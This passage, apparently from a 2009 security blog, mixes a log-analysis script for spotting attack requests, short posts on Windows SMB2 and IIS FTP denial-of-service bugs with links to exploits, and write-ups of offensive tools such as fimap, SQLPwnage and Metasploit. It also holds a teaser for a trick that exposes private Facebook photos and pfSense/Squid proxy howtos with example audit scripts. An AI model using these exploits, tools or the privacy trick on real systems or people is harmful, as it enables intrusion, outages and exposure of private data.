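        m = LOG_RE.match(line)
        if m:
            row = m.groupdict()
            row["status"] = int(row["status"])
            rows.append(row)
    return rows


def suspicious_requests(rows, only_successful=True):
    """Return [(ip, uri, status, [reasons])] for requests matching any check.
    With only_successful=True keep 2xx/3xx replies only (the page's grep -v 404 idea,
    done on the status field so a 404 in the byte count cannot hide a line)."""
    hits = []
    for r in rows:
        reasons = [name for name, rx in CHECKS if rx.search(r["uri"])]
        if reasons and (not only_successful or 200 <= r["status"] < 400):
            hits.append((r["ip"], r["uri"], r["status"], reasons))
    return hits


if __name__ == "__main__":
    for ip, uri, status, reasons in suspicious_requests(parse_access_log(SAMPLE_ACCESS_LOG)):
        print(f"{ip:15} {status} {','.join(reasons):12} {uri}")
```

Read the output the way the text says: the redirect_to hit from the WordPress login page is noise, while one client issuing a traversal and then a wget in the same minute is the sequence that tells you which script to look at first.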

Document all of your findings!
Wrap Up

Root Compromise
If you determine that an attacker has gained root access you will need to contact your sales representative, to have a replacement server built. There is no way for you to guarantee that a server will be 100% safe after a root compromise.

Ideally you should upload your sites to the new server from a local backup; if local backups are not available, we can attempt to clean up the sites as best we can.

User Compromise
If your investigation determines that the server was not compromised at the root level, then it should be safe to remove the compromised files, if any, and inform the customer of your findings, along with recommendations to prevent this issue from recurring.

From: http://neranjara.org/article/title/How_to_Investigate_a_compromised_Linux_Server

Wednesday, September 09, 2009

Vista/2008/Windows 7 SMB2 BSOD 0Day

A vulnerability in Microsoft's SMB2 implementation can be triggered remotely to crash the system, and proof-of-concept code has been published. It affects Windows 7, Vista and Server 2008. The exploit needs no authentication, only file sharing enabled, and a single packet is enough to cause a BSOD. We recommend filtering access to TCP port 445 with a firewall.

More details, http://milw0rm.com/exploits/9594

Friday, September 04, 2009

Microsoft IIS 5.0/6.0 FTP Server (Stack Exhaustion) Denial of Service

There is a DoS vulnerability in the globbing functionality of IIS FTPD.
Anonymous users can exploit this if they have read access to a directory.
Normal users can exploit it too if they can read a directory.

The steps to exploit it are described here:
http://www.milw0rm.com/exploits/9587

fimap-A little tool for local and remote file inclusion auditing and exploitation

fimap is a little Python tool which can find, prepare, scan, audit, exploit and even google automatically for local and remote file inclusion bugs in web apps. fimap aims to be something like sqlmap, just for LFI/RFI bugs instead of SQL injection.

fimap is currently under heavy development but is usable. Feel free to test it!
This document and tool are not recommended for people who don't know what LFI/RFI is.
If you know what it is, it might be a handy tool for you.

You can download it here:
http://code.google.com/p/fimap/downloads/list

Monday, August 31, 2009

Indonesian Hackers Launch Independence Day Attack on Malaysian Web Sites

A ring of Indonesian hackers on Monday claimed to have attacked a list of more than 120 Web sites as retribution for Malaysia’s alleged theft of Indonesian cultural items and abuse of migrant workers.

A statement was posted on a Blogspot blog titled "Terselubung" saying that a number of Malaysian Web sites had been hacked and defaced to “celebrate” Malaysia’s Independence Day, which fell on Monday August 31.

“Today, August 31, 2009, an uncreative country, a country who likes to steal Indonesian culture, a country whose citizen is the mastermind of bombings in Indonesia, a country who has tortured many of our sisters — the migrant workers who worked there, a country who abused our national anthem, a country who harassed Indonesia on the Internet, a country that has stolen Sipadan and Ligitan islands, a country which has trespassed our water illegally, a country which received their independence from Britain, is celebrating its anniversary,” the Web site stated.

From HITB website

If you want to see original article from Terselubung blog is here:
http://terselubung.blogspot.com/2009/08/perang-online-dengan-malaysia-di-mulai.html

Friday, August 28, 2009

DNSenum

DNSenum is a pentesting tool created to enumerate DNS information about domains.
The purpose of dnsenum is to gather as much information as possible about a domain. The program currently performs the following operations:

1) Get the host's address (A record).
2) Get the nameservers (threaded).
3) Get the MX records (threaded).
4) Perform AXFR (zone transfer) queries on the nameservers (threaded).
5) Get extra names and subdomains via Google scraping (Google query = "allinurl: -www site:domain").
6) Brute force subdomains from a file; can also recurse on subdomains that have NS records (all threaded).
7) Calculate class C network ranges and perform whois queries on them (threaded).
8) Perform reverse lookups on net ranges (class C and/or whois net ranges) (threaded).
9) Write the IP blocks to the file domain_ips.txt.

Thursday, August 27, 2009

Hacking Exposed:Network Security Secrets and Solutions

I'm still reading this Hacking Exposed 6th Edition book. I hope I will finish this week.
Hacking Exposed established this entire genre of books. Now in its 6th (and 10th anniversary) edition, and having sold millions of copies throughout the world, the book remains the #1 best-selling computer security book in the world and is still just as useful and valuable as ever. Kurtz, McClure, and Scambray have once again updated this highly respected title to include the latest and greatest in attacks and exploits, as well as the cutting-edge countermeasures and security controls you can implement to protect your PC or your network.
New and updated material:

-New chapter on hacking hardware, including lock bumping, access card cloning, RFID hacks, USB U3 exploits, and Bluetooth device hijacking
-Updated Windows attacks and countermeasures, including new Vista and Server 2008 vulnerabilities and Metasploit exploits
-The latest UNIX Trojan and rootkit techniques and dangling pointer and input validation exploits
-New wireless and RFID security tools, including multilayered encryption and gateways
-All-new tracerouting and eavesdropping techniques used to target network hardware and Cisco devices
-Updated DoS, man-in-the-middle, DNS poisoning, and buffer overflow coverage
-VPN and VoIP exploits, including Google and TFTP tricks, SIP flooding, and IPsec hacking
-Fully updated chapters on hacking the Internet user, web hacking, and securing code

Table of contents

Part I: Casing the Establishment
Chapter 1. Footprinting
Chapter 2. Scanning
Chapter 3. Enumeration
Part II: System Hacking
Chapter 4. Hacking Windows
Chapter 5. Hacking Unix
Part III: Infrastructure Hacking
Chapter 6. Remote Connectivity and VoIP Hacking
Chapter 7. Network Devices
Chapter 8. Wireless Hacking
Chapter 9. Hacking Hardware
Part IV: Application and Data Hacking
Chapter 10. Hacking Code
Chapter 11. Web Hacking
Chapter 12. Hacking the Internet User
Part V: Appendixes
Appendix A. Ports
Appendix B. Top 14 Security Vulnerabilities
Appendix C. Denial of Service (DoS) and Distributed Denial of Service (DDoS) Attacks
Index

Auto SQL injection co-opts thousands of sites

An automated attack using SQL injection has compromised tens of thousands of Web pages with code that tries to upload a data-stealing Trojan horse program to visitors' computers, security firm ScanSafe said last week.

The attack, which had inserted iframe scripts into as many as 130,000 Web pages as of Tuesday, uses the compromised pages to attempt to infect visitors with a backdoor Trojan horse that includes keylogging and download functionality, Mary Landesman, senior security researcher for ScanSafe, said in an e-mail interview on Tuesday. The initial Web site compromises appear to have been accomplished through an automated database injection attack, which matches with a trend seen by Landesman and others.

"SQL injection attacks are the most commonly observed compromise vector," Landesman stated. "Web attacks have been growing at the rate of 1 percent per day over the past year, with over half of all observed attacks the result of SQL injection."

Web attacks using SQL injection have become a lot more popular in recent years. Last week, a federal indictment of an alleged data thief stated that all five corporate victims -- including Heartland Payment Systems and Hannaford Bros. -- had initially been compromised through an SQL injection attack. In 2008, about 20 percent of the 5,600 vulnerabilities entered into the National Vulnerability Database were related to SQL injection, according to the service's statistics page.

In the latest spate of attacks, the Trojan horse programs downloaded to compromised computers are poorly recognized by most security software, Landesman said.

"Signature detection ranges, with a high of roughly 50 percent of signature vendors detecting some of the malware and a low of less than 10 percent," she said. "The attackers are continually swapping domains, using multiple exploits, and swapping out the eventual malware binaries to ensure low detection rates from signature-based technologies."

This article from Securityfocus.com

Friday, July 31, 2009

New security site ... http://triviasecurity.net

http://triviasecurity.net

My friends and I will launch this Trivia Security site next week...I hope you all can participate in this forum ....

http://triviasecurity.net


About Trivia Security:
Trivia Security was born in early 2003 with one goal: to make it easier for the whole world to have everything under one site instead of spending hours searching. It was started by FreakXL; DerekDan joined the development of Trivia Security on Lycos servers, and as development neared completion in May 2003 Trivia was moved to a new server and the domain `triviasecurity.com` by DerekDan, now `triviasecurity.net`. aMado joined the Trivia Team and contributed a lot in the finishing stages. Without aMado, Trivia Security wouldn't be where it is right now.

Monday, July 27, 2009

Fuzzgrind

Fuzzgrind is a fully automatic fuzzing tool, generating test files with the purpose of discovering new execution paths likely to trigger bugs and potentially vulnerabilities.

It is based on the concept of symbolic execution. Thus, the tool starts from a file considered valid by the software under test, and analyses the execution path to extract any constraints tied to branch instructions followed by this software. By resolving constraints one by one, Fuzzgrind will alter the valid file to explore possible new branches of the software under test, in order to discover new vulnerabilities.

Fuzzgrind is licensed under the terms of the GNU GPL. Anybody is welcome to contribute!

Tuesday, March 24, 2009

FastTrack- Easier Penetration Testing Tool

Every IT professional, security engineer, security analyst and penetration tester is always looking for easier ways to perform penetration tests. I found this Fast-Track tool.

What is Fast-Track?
"Fast-Track is a python based open-source project aimed at helping Penetration Testers in an effort to identify, exploit, and further penetrate a network. Fast-Track was originally conceived when I was on a penetration test and found that there was generally a lack of tools or automation in certain attacks that were normally extremely advanced and time consuming. In an effort to reproduce some of my advanced attacks and propagate it down to my team at SecureState, I ended up writing Fast-Track for the public. Many of the issues Fast-Track exploits are due to improper sanitizing of client-side data within web applications, patch management, or lack of hardening techniques. All of these are relatively simple to fix if you know what to look for, but as penetration testers are extremely common findings for us. Fast-Track arms the penetration tester with advanced attacks that in most cases have never been performed before. Sit back relax, crank open a can of jolt cola and enjoy the ride. "

I tried one of the powerful tools in Fast-Track, SQLPwnage.
"This tool scans subnets looking for web servers. After found, it automatically starts to crawl the site looking for post parameters. Once a list of post parameters has been identified, Fast-Track will either try blind SQL injection or error based SQL injection and attempt to automatically exploit the system for you. If successful, whatever payload you specified will be delivered to you, this could be meterpreter, reverse shell, bind shell, reverse vnc, and much more. SQLPwnage will automatically re-enable xp_cmdshell if disabled, try to elevate permissions, and use the hex to binary bypass explained in the SQL bruter section to deliver our payloads."

You can see this video on how to use SQLPwnage.

Metasploit 3.2

The Metasploit Framework is a development platform for creating security tools and exploits. It's used by network security professionals to perform penetration tests, system administrators to verify patch installations, product vendors to perform regression testing, and security researchers world-wide.

Compared to Metasploit 3.0, getting attack code onto a target machine is easier in Metasploit 3.2 thanks to improvements to the Raw Packet Tools function. A new library called PacketFu is expected by Moore to provide packet injection for both wired and wireless endpoints. It also offers improved support for exploiting multi-core CPU machines, which had been more difficult to attack with previous versions of Metasploit.

Metasploit is also able to take exploit code and weaponize it in an .EXE (executable file) that can be deployed by an attacker. Moore said the EXE template that created EXE attacks has been improved in Metasploit 3.2 in order to defeat AntiVirus vendor signature detection.

If you have never tried Metasploit, you can download it here.

Saturday, February 28, 2009

SecurixNSM 1.3

Securix-NSM is the successor of Knoppix-NSM. It's an extension of our NSMnow technology, integrated with the universal Debian foundation and a range of other tools to work from. Like its predecessor, Securix-NSM is dedicated to providing a framework for individuals wanting to learn about Network Security Monitoring (NSM) or who want to quickly and reliably deploy an NSM capability in their network.

Securix-NSM is now based on Debian Live, which means that you can test all the tools in a live Debian session running on the CD without the need for a HardDisk Drive (HDD) installation.

You can download ISO here.

Monday, February 16, 2009

Enjoy your Facebook!!!

Alright so here’s how to get into anyone’s tagged photos even if they are private for you.

The only restriction is that they have to actually have tagged photos, either tagged by others or tagged by themselves. You can only see the last 20 tagged photos by others and 20 tagged photos of themselves before an error pops up.

If you want to see the steps, click here.



Saturday, February 07, 2009

Howto: Installing Squid Proxy in pfSense

Setup a Squid Transparent Proxy using pfSense

What is Pfsense?
pfSense is a free, open source customized distribution of FreeBSD tailored for use as a firewall and router. In addition to being a powerful, flexible firewalling and routing platform, it includes a long list of related features and a package system allowing further expandability without adding bloat and potential security vulnerabilities to the base distribution.

What is Squid?
Squid is a proxy server and web cache daemon. It has a wide variety of uses, from speeding up a web server by caching repeated requests, to caching web, DNS and other computer network lookups for a group of people sharing network resources, to aiding security by filtering traffic.

Tutorial:

This howto describes how to install and configure Squid using pfSense.
1. Firstly, you need to install pfSense. See the documentation here.
2. After you have installed pfSense, access the pfSense webGUI using your pfSense IP address, e.g. http://192.168.1.4/ . Enter the username and password for your pfSense webGUI and you should see this window (Status -> System). This is where we start.
3. Now go to the System tab and choose Packages. Scroll down to the squid package and install it by clicking the + (Add) button on the right of that package.
4. The Squid package is now being installed into pfSense. After the installation has finished, you can start configuring your Squid proxy server.
5. Now go to the Services -> Proxy server tab. It opens on the General Settings tab for Squid. Set the Proxy interface, Allow users on interface, Transparent Proxy, Log store directory, Proxy port and other settings. Hit the Save button at the end of the page to save your proxy settings.
6. Then go to the Cache Management tab. Set the Hard disk cache size, Hard disk cache location, Memory cache size, Minimum object size, Maximum object size and any other settings you want. Hit the Save button.
7. Lastly, set the Access Control for the proxy server and hit the Save button to save the configuration. Keep the allowed subnets limited to your LAN: a proxy that is reachable from the WAN side with permissive access lists is an open proxy.
8. Now you have finished installing and configuring the Squid transparent proxy using pfSense. Your Squid proxy server is ready to be used.
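Once the proxy is running, the log directory chosen in step 5 is where you verify that the access controls from step 7 are doing what you expect. The following is an added example, not part of the original howto or of the pfSense squid package: it parses Squid's native access.log format, counts requests rejected by the ACLs (TCP_DENIED) per client, and flags CONNECT tunnels to ports other than 443, which show up when clients reach the proxy port directly rather than through the transparent redirect. The log lines are constructed for the example, not real traffic.

```python
"""Summarize a Squid native-format access.log for the pfSense/Squid setup above."""
import re
from collections import Counter

# Native access.log layout (the squid package's default):
#   time elapsed client action/status size method URL user hierarchy/peer content-type
LINE_RE = re.compile(
    r"^(?P<ts>\d+\.\d+)\s+(?P<elapsed>\d+)\s+(?P<client>\S+)\s+"
    r"(?P<action>[A-Z_]+)/(?P<status>\d{3})\s+(?P<size>\d+)\s+(?P<method>\S+)\s+"
    r"(?P<url>\S+)\s+(?P<user>\S+)\s+(?P<hier>\S+)\s+(?P<ctype>\S+)$"
)

# Constructed sample lines (not real traffic): 192.168.1.77 is rejected by the
# access control list twice and also tries to tunnel SMTP through the proxy port.
SAMPLE_LOG = """\
1233999001.101    245 192.168.1.50 TCP_MISS/200 1234 GET http://www.example.com/index.html - DIRECT/93.184.216.34 text/html
1233999002.202     12 192.168.1.50 TCP_HIT/200 5120 GET http://www.example.com/logo.png - NONE/- image/png
1233999003.303      3 192.168.1.77 TCP_DENIED/403 1412 GET http://www.example.org/ - NONE/- text/html
1233999004.404      2 192.168.1.77 TCP_DENIED/403 1412 GET http://www.example.net/ - NONE/- text/html
1233999005.505   9876 192.168.1.77 TCP_MISS/200 6000 CONNECT mail.example.com:25 - DIRECT/203.0.113.10 -
1233999006.606    110 192.168.1.50 TCP_MISS/200 3000 CONNECT www.example.com:443 - DIRECT/93.184.216.34 -
"""


def parse_line(line):
    """Return a dict of the fields, or None for a line that is not in native format."""
    m = LINE_RE.match(line.strip())
    if not m:
        return None
    rec = m.groupdict()
    rec["status"] = int(rec["status"])
    rec["size"] = int(rec["size"])
    return rec


def connect_port(url):
    """Destination port of a CONNECT request, whose URL field is just host:port."""
    _, _, port = url.rpartition(":")
    return int(port) if port.isdigit() else None


def analyze(log_text, allowed_connect_ports=(443,)):
    """Return (denied requests per client, list of (client, host:port) for
    CONNECT requests to ports outside allowed_connect_ports)."""
    denied = Counter()
    odd_connects = []
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec is None:
            continue  # skip blank or foreign lines rather than crashing
        if rec["action"].startswith("TCP_DENIED"):
            denied[rec["client"]] += 1
        elif rec["method"] == "CONNECT" and connect_port(rec["url"]) not in allowed_connect_ports:
            odd_connects.append((rec["client"], rec["url"]))
    return denied, odd_connects


if __name__ == "__main__":
    denied, odd = analyze(SAMPLE_LOG)
    for client, n in denied.most_common():
        print(f"{client}: {n} denied request(s)")
    for client, dest in odd:
        print(f"{client}: CONNECT to {dest}")
```

Run it against your own log by reading the file from the Log store directory into `analyze()`; a client that repeatedly hits TCP_DENIED or opens CONNECT tunnels to mail or SSH ports is worth a closer look in the Access Control settings.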


Setup a VideoCache on pfSense

This howto covers the process of installing VideoCache on pfSense. It assumes you have already installed the Squid proxy on pfSense as described above.
1. Firstly, you need to install Python.
• Use the shell (console or ssh) on pfSense and run the following command:
# pkg_add -r python
• Install the additional libraries needed:
# pkg_add -r py25-bsddb
# pkg_add -r py25-gdbm
# pkg_add -r py25-sqlite3
# pkg_add -r py25-tkinter


2. After that, install URLGrabber.
• Download the latest version of urlgrabber from the URLGrabber download archive (x.x.x stands for the version number) and install it. There is no need to build an RPM package on FreeBSD; setup.py install is enough.
# fetch http://linux.duke.edu/projects/urlgrabber/download/urlgrabber-x.x.x.tar.gz
# tar -xzf urlgrabber-x.x.x.tar.gz
# cd urlgrabber-x.x.x
# python setup.py install


3. Then, install iniparse.
• Download the latest version of python-iniparse from the iniparse project website and install it.
# fetch http://iniparse.googlecode.com/files/iniparse-x.x.x.tar.gz
# tar -xzf iniparse-x.x.x.tar.gz
# cd iniparse-x.x.x
# python setup.py install


4. Then, install VideoCache.
# fetch http://cachevideos.com/sites/default/files/pub/videocache/videocache-x.x.tar.gz
# tar -xvzf videocache-x.x.tar.gz
# cd videocache-x.x
# python setup.py install


5. Configure VideoCache
• Using vi, edit /etc/videocache.conf and set the following options:
- proxy: the IP address and port on which Squid is listening on pfSense.
- cache_host: the IP address of pfSense.
6. Configure Squid
Now add the following lines to /usr/local/pkg/squid.inc after the acl section.

# --BEGIN-- videocache config for squid
url_rewrite_program /usr/bin/python /usr/share/videocache/videocache.py
url_rewrite_children 10
acl videocache_allow_url url_regex -i \.youtube\.com\/get_video
acl videocache_allow_url url_regex -i \.cache[a-z0-9]?[a-z0-9]?[a-z0-9]?\.googlevideo\.com\/videoplayback
acl videocache_allow_url url_regex -i \.cache[a-z0-9]?[a-z0-9]?[a-z0-9]?\.googlevideo\.com\/get_video
acl videocache_allow_url url_regex -i proxy\-[0-9][0-9]\.dailymotion\.com\/
acl videocache_allow_url url_regex -i [a-z0-9][0-9a-z][0-9a-z]?[0-9a-z]?[0-9a-z]?\.xtube\.com\/(.*)flv
acl videocache_allow_url url_regex -i bitcast\.vimeo\.com\/vimeo\/videos\/
acl videocache_allow_url url_regex -i va\.wrzuta\.pl\/wa[0-9][0-9][0-9][0-9]?
acl videocache_allow_url url_regex -i \.files\.youporn\.com\/(.*)\/flv\/
acl videocache_allow_url url_regex -i \.msn\.com\.edgesuite\.net\/(.*)\.flv
acl videocache_allow_dom dstdomain v.mccont.com vp.video.google.com dl.redtube.com
acl videocache_deny_url url_regex -i http:\/\/[a-z][a-z]\.youtube\.com http:\/\/www\.youtube\.com
url_rewrite_access deny videocache_deny_url
url_rewrite_access allow videocache_allow_url
url_rewrite_access allow videocache_allow_dom
redirector_bypass on
# --END-- videocache config for squid


• Save the file and restart the squid service; you now have VideoCache running on your pfSense.
P/s: You need to disable the https option in the General Settings tab of the proxy server.
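Before trusting the url_rewrite_access lines above, it is worth checking which URLs they actually hand to the rewriter. Squid's url_regex ACL is a case-insensitive regex search over the whole request URL, so a pattern that does not anchor itself matches anywhere in the URL, path and query included. The following is an added example, not part of the original howto or of VideoCache: it copies the patterns from the squid.conf fragment above, walks the url_rewrite_access lines in Squid's first-match order, and evaluates them against constructed sample URLs. The tightened first pattern (TIGHT_ALLOW_URL) and the sample URLs are assumptions of the example, not from the page.

```python
"""Evaluate the videocache url_rewrite_access rules above against sample URLs."""
import re

# url_regex patterns copied from the squid.conf fragment on the page.
ALLOW_URL = [
    r"\.youtube\.com\/get_video",
    r"\.cache[a-z0-9]?[a-z0-9]?[a-z0-9]?\.googlevideo\.com\/videoplayback",
    r"\.cache[a-z0-9]?[a-z0-9]?[a-z0-9]?\.googlevideo\.com\/get_video",
    r"proxy\-[0-9][0-9]\.dailymotion\.com\/",
    r"[a-z0-9][0-9a-z][0-9a-z]?[0-9a-z]?[0-9a-z]?\.xtube\.com\/(.*)flv",
    r"bitcast\.vimeo\.com\/vimeo\/videos\/",
    r"va\.wrzuta\.pl\/wa[0-9][0-9][0-9][0-9]?",
    r"\.files\.youporn\.com\/(.*)\/flv\/",
    r"\.msn\.com\.edgesuite\.net\/(.*)\.flv",
]
# dstdomain entries without a leading dot match that exact host only.
ALLOW_DOM = {"v.mccont.com", "vp.video.google.com", "dl.redtube.com"}
DENY_URL = [
    r"http:\/\/[a-z][a-z]\.youtube\.com",
    r"http:\/\/www\.youtube\.com",
]

# Assumed tightened form of the first allow pattern (not from the page): anchored
# at the start of the URL, so ".youtube.com/get_video" must be the end of the
# host and the start of the path, not something buried in a path or query.
TIGHT_ALLOW_URL = [r"^http:\/\/[a-z0-9.-]+\.youtube\.com\/get_video"] + ALLOW_URL[1:]


def host_of(url):
    """Host part of an absolute URL, lower-cased (empty string if unparseable)."""
    m = re.match(r"^[a-z]+://([^/:?#]+)", url, re.I)
    return m.group(1).lower() if m else ""


def rewrite_decision(url, allow_url=ALLOW_URL):
    """Mimic Squid's url_rewrite_access evaluation: lines are checked in order and
    the first matching line wins. If no line matches, Squid applies the opposite of
    the last line; the last line here is an allow, so the implicit default is deny
    (the request is not sent to the rewriter)."""
    if any(re.search(p, url, re.I) for p in DENY_URL):
        return "deny"
    if any(re.search(p, url, re.I) for p in allow_url):
        return "allow"
    if host_of(url) in ALLOW_DOM:
        return "allow"
    return "deny"


# Constructed sample URLs (assumptions of this example, not from the page).
SAMPLE_URLS = [
    "http://www.youtube.com/get_video?video_id=abc",           # deny list hits first
    "http://v4.lscache7.c.youtube.com/get_video?video_id=abc", # allow_url
    "http://vp.video.google.com/videoplayback?id=1",           # allow_dom
    "http://www.example.com/index.html",                       # nothing matches
    "http://attacker.example/x.youtube.com/get_video",         # unanchored match in path
]


def decisions(urls=SAMPLE_URLS, allow_url=ALLOW_URL):
    """Map each URL to its decision under the given allow_url list."""
    return {u: rewrite_decision(u, allow_url) for u in urls}


if __name__ == "__main__":
    for label, rules in (("as configured", ALLOW_URL), ("anchored", TIGHT_ALLOW_URL)):
        print(label)
        for u, d in decisions(allow_url=rules).items():
            print(f"  {d:5} {u}")
```

The last sample URL is the check to keep in mind: with the patterns as written, any host can get a URL routed to the rewriter simply by putting ".youtube.com/get_video" in its path, because nothing ties the pattern to the host. Anchoring the pattern at `^http://` and requiring the host itself to end in `.youtube.com` closes that; the same treatment applies to the other unanchored patterns in the fragment.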

Thursday, January 22, 2009

Time and Attack Mapper (TA-Mapper)

Time and Attack Mapper (alternatively known as TA-Mapper) is an effort estimator tool for blackbox security assessment (or penetration testing) of applications. This tool provides more accurate estimation when compared to rough estimation. Penetration testers who always have a hard time explaining or justifying the efforts charged (or quoted) to their customers can find this tool handy, as it lets them calculate the effort required for application penetration testing with greater accuracy. In addition, this tool helps application pen-testers itemize their penetration testing efforts at the micro level and provides more clarity about their pen-testing activities. In future I have plans to extend this tool's ability to generate test cases.

For more information, go to http://www.hackerscenter.com/

Wednesday, January 21, 2009

NSMnow 1.3

NSMnow is all about building a Network Security Monitoring (NSM) framework. It's very fast and easy, without the messy patching and configuration of each tool needed to get the system up and running. It builds a Sguil system with the minimum amount of fuss, so you can actually focus on using Sguil instead of building it.
For more details, see this site: http://www.securixlive.com/
If you want to download it: here